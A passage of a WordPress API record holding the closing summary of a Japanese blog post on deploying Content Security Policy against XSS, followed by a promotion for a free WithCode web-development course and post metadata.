wp-block-paragraph\">\u30fb<strong>CSP\u306e\u5f79\u5272<\/strong>\uff1aXSS\u653b\u6483\u3084\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u653b\u6483\u306e\u88ab\u5bb3\u3092\u8efd\u6e1b\u3059\u308b\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u6a5f\u80fd\uff08\u51fa\u529b\u30a8\u30b9\u30b1\u30fc\u30d7\u3068\u4f75\u7528\u3059\u308b\u591a\u5c64\u9632\u5fa1\uff09<br>\u30fb<strong>\u30db\u30ef\u30a4\u30c8\u30ea\u30b9\u30c8\u65b9\u5f0f<\/strong>\uff1a\u8a31\u53ef\u3059\u308b\u30ea\u30bd\u30fc\u30b9\u306e\u53d6\u5f97\u5143\u3092\u660e\u793a\u7684\u306b\u6307\u5b9a<br>\u30fb<strong>\u4e3b\u8981\u30c7\u30a3\u30ec\u30af\u30c6\u30a3\u30d6<\/strong>\uff1adefault-src\u3001script-src\u3001style-src\u3001img-src\u306a\u3069\u3067\u7d30\u304b\u304f\u5236\u5fa1<br>\u30fb<strong>\u5b9f\u8df5\u7684\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8<\/strong>\uff1a\u7528\u9014\u5225\uff08\u9759\u7684\u30b5\u30a4\u30c8\u3001CDN\u4f7f\u7528\u3001SPA\u3001nonce\uff09\u306e\u8a2d\u5b9a\u4f8b\u3092\u63d0\u4f9b<br>\u30fb<strong>\u6bb5\u968e\u7684\u5c0e\u5165<\/strong>\uff1aReport-Only\u30e2\u30fc\u30c9\u2192\u7de9\u3044\u30dd\u30ea\u30b7\u30fc\u2192\u6bb5\u968e\u7684\u53b3\u683c\u5316\u2192\u6700\u7d42\u30dd\u30ea\u30b7\u30fc<br>\u30fb<strong>\u30c8\u30e9\u30d6\u30eb\u30b7\u30e5\u30fc\u30c6\u30a3\u30f3\u30b0<\/strong>\uff1aGoogle Analytics\u3001\u30a4\u30f3\u30e9\u30a4\u30f3\u30b9\u30af\u30ea\u30d7\u30c8\u3001iframe\u3001\u30d5\u30a9\u30f3\u30c8\u306a\u3069\u306e\u5bfe\u51e6\u6cd5<br>\u30fb<strong>\u30c6\u30b9\u30c8\u30c4\u30fc\u30eb<\/strong>\uff1aChrome DevTools\u3001CSP Evaluator\u3001Report URI\u3067\u7d99\u7d9a\u7684\u306a\u76e3\u8996<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong><span class=\"swl-marker 
mark_yellow\">CSP\u306f\u3001Web\u30b5\u30a4\u30c8\u306e\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u3092\u5927\u5e45\u306b\u5411\u4e0a\u3055\u305b\u308b\u5f37\u529b\u306a\u30c4\u30fc\u30eb\u3067\u3059\u3002<\/span><\/strong>\u9069\u5207\u306b\u5b9f\u88c5\u3059\u308b\u3053\u3068\u3067\u3001XSS\u653b\u6483\u306a\u3069\u306e\u6df1\u523b\u306a\u8105\u5a01\u304b\u3089\u3001\u30e6\u30fc\u30b6\u30fc\u3068Web\u30b5\u30a4\u30c8\u3092\u5b88\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u307e\u305a\u306fReport-Only\u30e2\u30fc\u30c9\u3067\u73fe\u72b6\u3092\u628a\u63e1\u3057\u3001\u6bb5\u968e\u7684\u306b\u30dd\u30ea\u30b7\u30fc\u3092\u53b3\u683c\u5316\u3057\u3066\u3044\u304f\u3053\u3068\u3092\u304a\u3059\u3059\u3081\u3057\u307e\u3059\u3002\u5b9f\u88c5\u5f8c\u3082\u7d99\u7d9a\u7684\u306b\u30ec\u30dd\u30fc\u30c8\u3092\u76e3\u8996\u3057\u3001\u65b0\u3057\u3044\u8105\u5a01\u3084\u8981\u4ef6\u306b\u5fdc\u3058\u3066\u30dd\u30ea\u30b7\u30fc\u3092\u66f4\u65b0\u3057\u3066\u3044\u304d\u307e\u3057\u3087\u3046\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">WithCode\u3092\u4f53\u9a13\u3067\u304d\u308b\u521d\u7d1a\u30b3\u30fc\u30b9\u516c\u958b\u4e2d\uff01<\/h2>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft size-full\"><img decoding=\"async\" width=\"600\" height=\"500\" src=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2024\/04\/\u30d0\u30ca\u30fc_300\u00d7250_20240425.png\" alt=\"\" class=\"wp-image-2650\"\/><\/figure>\n<\/div>\n\n\n<p class=\"wp-block-paragraph\">\u672c\u8a18\u4e8b\u3067\u3054\u7d39\u4ecb\u3057\u305fContent Security 
Policy\u306e\u5b9f\u88c5\u6280\u8853\u306f\u3001Web\u5236\u4f5c\u306e\u5b9f\u52d9\u3067\u975e\u5e38\u306b\u91cd\u8981\u306a\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u30b9\u30ad\u30eb\u3067\u3059\u3002WithCode\u3067\u306f\u3001\u3053\u3046\u3057\u305f\u6700\u65b0\u6280\u8853\u3092\u542b\u3080\u5b9f\u8df5\u7684\u306aWeb\u5236\u4f5c\u30b9\u30ad\u30eb\u3092\u5b66\u3079\u308b\u74b0\u5883\u3092\u63d0\u4f9b\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u521d\u7d1a\u30b3\u30fc\u30b9\uff08\u00a549,800\uff09\u304c\u5b8c\u5168\u7121\u6599\u306b\uff01<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>\u671f\u9593\uff1a<\/strong>1\u9031\u9593<\/li>\n\n\n\n<li><strong>\u5b66\u7fd2\u5185\u5bb9\uff1a<\/strong><br>\u30ed\u30fc\u30c9\u30de\u30c3\u30d7\/\u57fa\u790e\u77e5\u8b58\/\u74b0\u5883\u69cb\u7bc9\/HTML\/CSS\/LP\u30fb\u30dd\u30fc\u30c8\u30d5\u30a9\u30ea\u30aa\u4f5c\u6210<br><strong><span class=\"swl-marker mark_yellow\">\u2192 \u6b63\u3057\u3044\u5b66\u7fd2\u65b9\u6cd5\u3067\u300c\u78ba\u304b\u306a\u6210\u9577\u300d\u3092\u5b9f\u611f\u3067\u304d\u308b\u30ab\u30ea\u30ad\u30e5\u30e9\u30e0<\/span><\/strong><\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u526f\u696d\u30fb\u30d5\u30ea\u30fc\u30e9\u30f3\u30b9\u304c\u4e3b\u6d41\u306b\u306a\u3063\u3066\u3044\u308b\u4eca\u3053\u305d\u3001\u81ea\u3089\u306e\u30b9\u30ad\u30eb\u3067\u7a3c\u3052\u308b\u4eba\u6750\u3092\u76ee\u6307\u3057\u3066\u307f\u307e\u305b\u3093\u304b\uff1f<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u672a\u7d4c\u9a13\u3067\u3082\u5fc3\u914d\u3059\u308b\u3053\u3068\u306f\u3042\u308a\u307e\u305b\u3093\u3002\u521d\u7d1a\u30b3\u30fc\u30b9\u3092\u53d7\u8b1b\u3055\u308c\u308b\u65b9\u306e\u5927\u591a\u6570\u306f\u30d7\u30ed\u30b0\u30e9\u30df\u30f3\u30b0\u672a\u7d4c\u9a13\u3067\u3059\u3002\u307e\u305a\u306f\u7121\u6599\u30ab\u30a6\u30f3\u30bb\u30ea\u30f3\u30b0\u3067\u3001\u60a9\u307f\u3084\u4e0d\u5b89\u3092\u304a\u805e\u304b\u305b\u304f\u3060\u3055\u3044\uff01<\/p>\n\n\n\n<div 
class=\"wp-block-buttons is-layout-flex wp-block-buttons-is-layout-flex\">\n<div class=\"wp-block-button\"><a class=\"wp-block-button__link has-white-color has-text-color has-background has-link-color wp-element-button\" href=\"https:\/\/withcode.tech\/reservation\/\" style=\"background-color:#ffbf00\"><strong>\u516c\u5f0f\u30b5\u30a4\u30c8\u304b\u3089\u7121\u6599\u30ab\u30a6\u30f3\u30bb\u30ea\u30f3\u30b0\u306b\u7533\u3057\u8fbc\u3080 \u2192<\/strong><\/a><\/div>\n<\/div>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Web\u30b5\u30a4\u30c8\u306e\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u306f\u3001\u958b\u767a\u8005\u306b\u3068\u3063\u3066\u6700\u3082\u91cd\u8981\u306a\u8ab2\u984c\u306e\u4e00\u3064\u3067\u3059\u3002\u7279\u306bXSS\uff08Cross-Site Scripting\uff09\u653b\u6483\u306f\u3001\u500b\u4eba\u60c5\u5831\u306e\u6f0f\u6d29\u3084\u30a2\u30ab\u30a6\u30f3\u30c8\u4e57\u3063\u53d6\u308a\u306a\u3069\u3001\u6df1\u523b\u306a\u88ab\u5bb3\u3092\u3082\u305f\u3089\u3059\u53ef\u80fd\u6027\u304c\u3042\u308a\u307e\u3059\u3002 \u672c\u8a18\u4e8b\u3067 
[&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":13219,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"om_disable_all_campaigns":false,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"swell_btn_cv_data":"","footnotes":""},"categories":[34,358],"tags":[66,68],"class_list":["post-12348","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-programming","category-html","tag-web","tag-html"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/withcode.tech\/media\/wp-json\/wp\/v2\/posts\/12348","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/withcode.tech\/media\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/withcode.tech\/media\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/withcode.tech\/media\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/withcode.tech\/media\/wp-json\/wp\/v2\/comments?post=12348"}],"version-history":[{"count":8,"href":"https:\/\/withcode.tech\/media\/wp-json\/wp\/v2\/posts\/12348\/revisions"}],"predecessor-version":[{"id":13358,"href":"https:\/\/withcode.tech\/media\/wp-json\/wp\/v2\/posts\/12348\/revisions\/13358"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/withcode.tech\/media\/wp-json\/wp\/v2\/media\/13219"}],"wp:attachment":[{"href":"https:\/\/withcode.tech\/media\/wp-json\/wp\/v2\/media?parent=12348"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/withcode.tech\/media\/wp-json\/wp\/v2\/categories?post=12348"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/withcode.tech\/media\/wp-json\/wp\/v2\/tags?post=12348"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}